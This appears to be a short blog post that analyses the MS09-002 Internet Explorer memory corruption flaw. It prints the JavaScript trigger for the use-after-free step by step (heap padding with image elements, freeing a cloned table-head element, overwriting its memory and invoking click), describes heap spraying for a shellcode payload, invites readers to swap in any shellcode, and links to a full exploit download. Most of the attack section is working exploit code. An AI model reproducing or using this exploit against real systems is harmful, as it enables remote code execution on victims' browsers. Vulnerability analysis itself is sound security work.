To contact us Click HERE
Alright, so we've been looking at the recent MS09-002 Memory Corruption Advisory released last week.
www.microsoft.com/technet/security/bulletin/MS09-002.mspx
We have provided a quick analysis of the vulnerability:
Initially, we call our global deconstructor to "prep" our memory for corruption. This method is used to clean up our allocated and potentially lost spaces of memory.
CollectGarbage();
Next, we pad the memory by creating a minimum of 256 image elements within an array. I found that anything less than 256 does not give us enough padding to leverage when our exception occurs. Most exploits are using between 512 and 1024 images.
var a1 = new Array();
for (var x = 0; x < 256; x++) {
a1.push(document.createElement("img"));
}
Then, we want to create a table header or table body for interacting with and start the interaction.
o1=document.createElement("thead");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
Once again we're going to prep our memory for corruption here:
o1=null; CollectGarbage();
The fault is triggered when we free our memory that was allocated by our previously created table head or table body element and then begin overwriting our created element locations, finally calling our table for execution (o2.click). This results in adjacent heap corruption leading to code execution.
for(var x=0;x<a1.length;x++) {
a1[x].src=s1;
}
o2.click;
Our exploit begins with the typical heap spraying method, providing us with a reliable location for installing our stage-1 execution payload.
Our personal exploit has been trimmed up to speed up execution time. The shellcode can be replaced to do whatever you'd like.
blacksecurity.org/cve20090075.html.gz
- redsand
Hiç yorum yok:
Yorum Gönder